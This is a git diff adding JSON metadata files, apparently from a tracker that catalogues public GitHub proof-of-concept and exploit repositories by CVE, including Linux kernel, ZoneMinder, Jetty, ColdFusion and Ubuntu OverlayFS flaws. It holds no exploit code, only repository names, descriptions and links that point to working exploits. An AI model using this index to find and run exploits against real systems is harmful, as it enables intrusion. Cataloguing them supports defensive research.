+++ b/2023/CVE-2023-2598.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 719803136,
+ "name": "io_uring_LPE-CVE-2023-2598",
+ "full_name": "ysanatomic\/io_uring_LPE-CVE-2023-2598",
+ "owner": {
+ "login": "ysanatomic",
+ "id": 41269324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41269324?v=4",
+ "html_url": "https:\/\/github.com\/ysanatomic"
+ },
+ "html_url": "https:\/\/github.com\/ysanatomic\/io_uring_LPE-CVE-2023-2598",
+ "description": "LPE PoC of a vulnerability in the io_uring subsystem of the Linux Kernel.",
+ "fork": false,
+ "created_at": "2023-11-16T23:41:27Z",
+ "updated_at": "2024-06-21T21:27:37Z",
+ "pushed_at": "2023-11-23T18:37:18Z",
+ "stargazers_count": 85,
+ "watchers_count": 85,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 85,
+ "score": 0,
+ "subscribers_count": 7
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26035.json b/2023/CVE-2023-26035.json
new file mode 100644
index 0000000000..1239744e25
--- /dev/null
+++ b/2023/CVE-2023-26035.json
@@ -0,0 +1,130 @@
+[
+ {
+ "id": 730370673,
+ "name": "CVE-2023-26035",
+ "full_name": "rvizx\/CVE-2023-26035",
+ "owner": {
+ "login": "rvizx",
+ "id": 84989569,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4",
+ "html_url": "https:\/\/github.com\/rvizx"
+ },
+ "html_url": "https:\/\/github.com\/rvizx\/CVE-2023-26035",
+ "description": "Unauthenticated RCE in ZoneMinder Snapshots - Poc Exploit",
+ "fork": false,
+ "created_at": "2023-12-11T19:23:13Z",
+ "updated_at": "2024-05-07T03:32:07Z",
+ "pushed_at": "2024-05-07T03:32:04Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-26035",
+ "exploit"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 731218902,
+ "name": "CVE-2023-26035",
+ "full_name": "heapbytes\/CVE-2023-26035",
+ "owner": {
+ "login": "heapbytes",
+ "id": 56447720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56447720?v=4",
+ "html_url": "https:\/\/github.com\/heapbytes"
+ },
+ "html_url": "https:\/\/github.com\/heapbytes\/CVE-2023-26035",
+ "description": "POC script for CVE-2023-26035 (zoneminder 1.36.32) ",
+ "fork": false,
+ "created_at": "2023-12-13T15:40:24Z",
+ "updated_at": "2024-02-29T15:06:14Z",
+ "pushed_at": "2023-12-13T15:43:54Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-26035",
+ "exploit",
+ "poc",
+ "zoneminder"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735320790,
+ "name": "CVE-2023-26035",
+ "full_name": "Yuma-Tsushima07\/CVE-2023-26035",
+ "owner": {
+ "login": "Yuma-Tsushima07",
+ "id": 63207324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4",
+ "html_url": "https:\/\/github.com\/Yuma-Tsushima07"
+ },
+ "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2023-26035",
+ "description": "ZoneMinder Snapshots - Unauthenticated",
+ "fork": false,
+ "created_at": "2023-12-24T13:37:39Z",
+ "updated_at": "2023-12-25T14:33:51Z",
+ "pushed_at": "2023-12-24T13:55:28Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736382730,
+ "name": "zoneminder_CVE-2023-26035",
+ "full_name": "Faelian\/zoneminder_CVE-2023-26035",
+ "owner": {
+ "login": "Faelian",
+ "id": 4268373,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4268373?v=4",
+ "html_url": "https:\/\/github.com\/Faelian"
+ },
+ "html_url": "https:\/\/github.com\/Faelian\/zoneminder_CVE-2023-26035",
+ "description": "Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33",
+ "fork": false,
+ "created_at": "2023-12-27T18:44:22Z",
+ "updated_at": "2024-02-15T05:49:30Z",
+ "pushed_at": "2023-12-27T21:08:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26048.json b/2023/CVE-2023-26048.json
new file mode 100644
index 0000000000..44064fa712
--- /dev/null
+++ b/2023/CVE-2023-26048.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 712774895,
+ "name": "jetty_9.4.31_CVE-2023-26048",
+ "full_name": "Trinadh465\/jetty_9.4.31_CVE-2023-26048",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/jetty_9.4.31_CVE-2023-26048",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-01T06:57:10Z",
+ "updated_at": "2023-11-01T10:21:01Z",
+ "pushed_at": "2023-11-01T12:09:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 723994552,
+ "name": "Jetty-v9.4.31_CVE-2023-26048",
+ "full_name": "hshivhare67\/Jetty-v9.4.31_CVE-2023-26048",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/Jetty-v9.4.31_CVE-2023-26048",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-27T07:19:49Z",
+ "updated_at": "2023-11-27T07:20:44Z",
+ "pushed_at": "2023-11-27T07:23:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26049.json b/2023/CVE-2023-26049.json
new file mode 100644
index 0000000000..19bbacc28b
--- /dev/null
+++ b/2023/CVE-2023-26049.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 723996800,
+ "name": "Jetty_v9.4.31_CVE-2023-26049",
+ "full_name": "hshivhare67\/Jetty_v9.4.31_CVE-2023-26049",
+ "owner": {
+ "login": "hshivhare67",
+ "id": 67005408,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4",
+ "html_url": "https:\/\/github.com\/hshivhare67"
+ },
+ "html_url": "https:\/\/github.com\/hshivhare67\/Jetty_v9.4.31_CVE-2023-26049",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-27T07:25:34Z",
+ "updated_at": "2024-03-20T11:38:27Z",
+ "pushed_at": "2024-03-20T11:39:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26067.json b/2023/CVE-2023-26067.json
new file mode 100644
index 0000000000..b1bc2b7c2e
--- /dev/null
+++ b/2023/CVE-2023-26067.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 675834921,
+ "name": "CVE-2023-26067",
+ "full_name": "horizon3ai\/CVE-2023-26067",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-26067",
+ "description": "Lexmark CVE-2023-26067",
+ "fork": false,
+ "created_at": "2023-08-07T20:55:15Z",
+ "updated_at": "2024-06-05T16:34:37Z",
+ "pushed_at": "2023-08-08T13:54:06Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26136.json b/2023/CVE-2023-26136.json
new file mode 100644
index 0000000000..9228350e60
--- /dev/null
+++ b/2023/CVE-2023-26136.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 727231092,
+ "name": "SealSecurityAssignment",
+ "full_name": "CUCUMBERanOrSNCompany\/SealSecurityAssignment",
+ "owner": {
+ "login": "CUCUMBERanOrSNCompany",
+ "id": 70776104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70776104?v=4",
+ "html_url": "https:\/\/github.com\/CUCUMBERanOrSNCompany"
+ },
+ "html_url": "https:\/\/github.com\/CUCUMBERanOrSNCompany\/SealSecurityAssignment",
+ "description": "Researching on the vulnrability CVE-2023-26136",
+ "fork": false,
+ "created_at": "2023-12-04T13:01:29Z",
+ "updated_at": "2024-01-12T09:36:19Z",
+ "pushed_at": "2023-12-06T10:50:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796819002,
+ "name": "Open-Source-Seal-Security",
+ "full_name": "ronmadar\/Open-Source-Seal-Security",
+ "owner": {
+ "login": "ronmadar",
+ "id": 86679386,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86679386?v=4",
+ "html_url": "https:\/\/github.com\/ronmadar"
+ },
+ "html_url": "https:\/\/github.com\/ronmadar\/Open-Source-Seal-Security",
+ "description": "Fix open source package uses tough-cookie 2.5.0 - CVE-2023-26136,",
+ "fork": false,
+ "created_at": "2024-05-06T17:32:10Z",
+ "updated_at": "2024-05-07T12:18:59Z",
+ "pushed_at": "2024-05-07T12:18:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26144.json b/2023/CVE-2023-26144.json
new file mode 100644
index 0000000000..2e7495d20b
--- /dev/null
+++ b/2023/CVE-2023-26144.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 679233677,
+ "name": "apollo-koa-minimal",
+ "full_name": "tadhglewis\/apollo-koa-minimal",
+ "owner": {
+ "login": "tadhglewis",
+ "id": 53756558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53756558?v=4",
+ "html_url": "https:\/\/github.com\/tadhglewis"
+ },
+ "html_url": "https:\/\/github.com\/tadhglewis\/apollo-koa-minimal",
+ "description": "GraphQL vulnerability disclosure: CVE-2023-26144",
+ "fork": false,
+ "created_at": "2023-08-16T11:44:22Z",
+ "updated_at": "2024-06-05T00:24:49Z",
+ "pushed_at": "2024-05-30T00:30:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26255.json b/2023/CVE-2023-26255.json
new file mode 100644
index 0000000000..cc46507fb4
--- /dev/null
+++ b/2023/CVE-2023-26255.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 683213602,
+ "name": "CVE-2023-26255-Exp",
+ "full_name": "tucommenceapousser\/CVE-2023-26255-Exp",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2023-26255-Exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-25T21:56:48Z",
+ "updated_at": "2023-08-25T21:59:39Z",
+ "pushed_at": "2023-08-25T22:00:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 685301639,
+ "name": "CVE-2023-26255-6",
+ "full_name": "Nian-Stars\/CVE-2023-26255-6",
+ "owner": {
+ "login": "Nian-Stars",
+ "id": 87457806,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87457806?v=4",
+ "html_url": "https:\/\/github.com\/Nian-Stars"
+ },
+ "html_url": "https:\/\/github.com\/Nian-Stars\/CVE-2023-26255-6",
+ "description": "Jira plugin STAGIL Navigation FileName的参数任意文件读取漏洞",
+ "fork": false,
+ "created_at": "2023-08-30T23:57:10Z",
+ "updated_at": "2023-08-31T00:03:30Z",
+ "pushed_at": "2023-08-31T02:16:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26256.json b/2023/CVE-2023-26256.json
new file mode 100644
index 0000000000..7856ed7569
--- /dev/null
+++ b/2023/CVE-2023-26256.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 682354311,
+ "name": "CVE-2023-26256",
+ "full_name": "0x7eTeam\/CVE-2023-26256",
+ "owner": {
+ "login": "0x7eTeam",
+ "id": 96908273,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4",
+ "html_url": "https:\/\/github.com\/0x7eTeam"
+ },
+ "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2023-26256",
+ "description": "CVE-2023-26255_POC,CVE-2023-26256_POC",
+ "fork": false,
+ "created_at": "2023-08-24T01:57:00Z",
+ "updated_at": "2023-10-18T17:35:28Z",
+ "pushed_at": "2023-08-24T02:27:52Z",
+ "stargazers_count": 33,
+ "watchers_count": 33,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 33,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 683988114,
+ "name": "CVE-2023-26256",
+ "full_name": "xhs-d\/CVE-2023-26256",
+ "owner": {
+ "login": "xhs-d",
+ "id": 87455689,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455689?v=4",
+ "html_url": "https:\/\/github.com\/xhs-d"
+ },
+ "html_url": "https:\/\/github.com\/xhs-d\/CVE-2023-26256",
+ "description": "CVE-2023-26256_POC",
+ "fork": false,
+ "created_at": "2023-08-28T08:00:16Z",
+ "updated_at": "2023-08-28T08:04:58Z",
+ "pushed_at": "2023-08-29T14:38:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 685129397,
+ "name": "CVE-2023-26256",
+ "full_name": "qs119\/CVE-2023-26256",
+ "owner": {
+ "login": "qs119",
+ "id": 143074431,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143074431?v=4",
+ "html_url": "https:\/\/github.com\/qs119"
+ },
+ "html_url": "https:\/\/github.com\/qs119\/CVE-2023-26256",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-30T15:21:00Z",
+ "updated_at": "2023-08-30T15:29:48Z",
+ "pushed_at": "2023-08-30T15:29:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 685757480,
+ "name": "CVE-2023-26256",
+ "full_name": "jcad123\/CVE-2023-26256",
+ "owner": {
+ "login": "jcad123",
+ "id": 87455633,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87455633?v=4",
+ "html_url": "https:\/\/github.com\/jcad123"
+ },
+ "html_url": "https:\/\/github.com\/jcad123\/CVE-2023-26256",
+ "description": "CVE-2023-26255_POC,CVE-2023-26256_POC",
+ "fork": false,
+ "created_at": "2023-09-01T00:10:36Z",
+ "updated_at": "2023-09-11T01:38:10Z",
+ "pushed_at": "2023-09-01T00:54:38Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26269.json b/2023/CVE-2023-26269.json
new file mode 100644
index 0000000000..271db0d735
--- /dev/null
+++ b/2023/CVE-2023-26269.json
@@ -0,0 +1,40 @@
+[
+ {
+ "id": 722756127,
+ "name": "CVE-2023-26269",
+ "full_name": "mbadanoiu\/CVE-2023-26269",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-26269",
+ "description": "CVE-2023-26269: Misconfigured JMX in Apache James",
+ "fork": false,
+ "created_at": "2023-11-23T21:55:30Z",
+ "updated_at": "2023-11-26T12:24:28Z",
+ "pushed_at": "2023-11-23T22:10:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "cve",
+ "cve-2023-26269",
+ "cves",
+ "local-privilege-escalation",
+ "mlet",
+ "unauthenticated"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-26360.json b/2023/CVE-2023-26360.json
new file mode 100644
index 0000000000..ef6daf1197
--- /dev/null
+++ b/2023/CVE-2023-26360.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 735810164,
+ "name": "CVE-2023-26360",
+ "full_name": "yosef0x01\/CVE-2023-26360",
+ "owner": {
+ "login": "yosef0x01",
+ "id": 96077889,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4",
+ "html_url": "https:\/\/github.com\/yosef0x01"
+ },
+ "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-26360",
+ "description": "Exploit for Arbitrary File Read for CVE-2023-26360 - Adobe Coldfusion",
+ "fork": false,
+ "created_at": "2023-12-26T06:26:01Z",
+ "updated_at": "2024-06-22T03:24:03Z",
+ "pushed_at": "2024-06-22T03:23:59Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800457140,
+ "name": "CVE-2023-26360-adobe-coldfusion-rce-exploit",
+ "full_name": "jakabakos\/CVE-2023-26360-adobe-coldfusion-rce-exploit",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-26360-adobe-coldfusion-rce-exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-14T11:22:35Z",
+ "updated_at": "2024-06-12T02:30:55Z",
+ "pushed_at": "2024-05-14T13:37:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2640.json b/2023/CVE-2023-2640.json
new file mode 100644
index 0000000000..d1341ee4f1
--- /dev/null
+++ b/2023/CVE-2023-2640.json
@@ -0,0 +1,212 @@
+[
+ {
+ "id": 678951072,
+ "name": "gameoverlay",
+ "full_name": "OllaPapito\/gameoverlay",
+ "owner": {
+ "login": "OllaPapito",
+ "id": 95946350,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95946350?v=4",
+ "html_url": "https:\/\/github.com\/OllaPapito"
+ },
+ "html_url": "https:\/\/github.com\/OllaPapito\/gameoverlay",
+ "description": "CVE-2023-2640 CVE-2023-32629",
+ "fork": false,
+ "created_at": "2023-08-15T19:07:02Z",
+ "updated_at": "2024-03-15T11:58:15Z",
+ "pushed_at": "2023-08-15T19:49:07Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 692901270,
+ "name": "GameOverlayFS",
+ "full_name": "luanoliveira350\/GameOverlayFS",
+ "owner": {
+ "login": "luanoliveira350",
+ "id": 11656264,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11656264?v=4",
+ "html_url": "https:\/\/github.com\/luanoliveira350"
+ },
+ "html_url": "https:\/\/github.com\/luanoliveira350\/GameOverlayFS",
+ "description": "GameoverlayFS (CVE-2023-2640 and CVE-2023-32629) exploit in Shell Script tested on Ubuntu 20.04 Kernel 5.4.0",
+ "fork": false,
+ "created_at": "2023-09-17T23:17:22Z",
+ "updated_at": "2024-03-26T00:05:06Z",
+ "pushed_at": "2023-09-17T23:38:32Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 702722845,
+ "name": "CVE-2023-2640-CVE-2023-32629",
+ "full_name": "g1vi\/CVE-2023-2640-CVE-2023-32629",
+ "owner": {
+ "login": "g1vi",
+ "id": 120142960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4",
+ "html_url": "https:\/\/github.com\/g1vi"
+ },
+ "html_url": "https:\/\/github.com\/g1vi\/CVE-2023-2640-CVE-2023-32629",
+ "description": "GameOver(lay) Ubuntu Privilege Escalation",
+ "fork": false,
+ "created_at": "2023-10-09T22:02:42Z",
+ "updated_at": "2024-06-20T23:21:00Z",
+ "pushed_at": "2023-10-09T22:44:21Z",
+ "stargazers_count": 105,
+ "watchers_count": 105,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 105,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 713583056,
+ "name": "CVE-2023-2640-CVE-2023-32629",
+ "full_name": "musorblyat\/CVE-2023-2640-CVE-2023-32629",
+ "owner": {
+ "login": "musorblyat",
+ "id": 131186350,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131186350?v=4",
+ "html_url": "https:\/\/github.com\/musorblyat"
+ },
+ "html_url": "https:\/\/github.com\/musorblyat\/CVE-2023-2640-CVE-2023-32629",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-02T20:19:57Z",
+ "updated_at": "2023-11-02T20:24:44Z",
+ "pushed_at": "2023-11-02T20:23:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765277718,
+ "name": "Ubuntu-GameOver-Lay",
+ "full_name": "SanjayRagavendar\/Ubuntu-GameOver-Lay",
+ "owner": {
+ "login": "SanjayRagavendar",
+ "id": 91368803,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91368803?v=4",
+ "html_url": "https:\/\/github.com\/SanjayRagavendar"
+ },
+ "html_url": "https:\/\/github.com\/SanjayRagavendar\/Ubuntu-GameOver-Lay",
+ "description": "Escalating Privilege using CVE-2023-2640 CVE-2023-3262 ",
+ "fork": false,
+ "created_at": "2024-02-29T16:04:58Z",
+ "updated_at": "2024-03-05T05:47:31Z",
+ "pushed_at": "2024-03-02T00:29:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 774642539,
+ "name": "CVE-2023-2640-CVE-2023-32629",
+ "full_name": "Nkipohcs\/CVE-2023-2640-CVE-2023-32629",
+ "owner": {
+ "login": "Nkipohcs",
+ "id": 117274957,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117274957?v=4",
+ "html_url": "https:\/\/github.com\/Nkipohcs"
+ },
+ "html_url": "https:\/\/github.com\/Nkipohcs\/CVE-2023-2640-CVE-2023-32629",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-19T22:56:24Z",
+ "updated_at": "2024-03-19T22:56:55Z",
+ "pushed_at": "2024-03-19T23:26:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804086046,
+ "name": "CVE-2023-2640-32629",
+ "full_name": "K5LK\/CVE-2023-2640-32629",
+ "owner": {
+ "login": "K5LK",
+ "id": 97132966,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97132966?v=4",
+ "html_url": "https:\/\/github.com\/K5LK"
+ },
+ "html_url": "https:\/\/github.com\/K5LK\/CVE-2023-2640-32629",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-21T23:39:02Z",
+ "updated_at": "2024-05-22T18:38:23Z",
+ "pushed_at": "2024-05-22T18:38:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
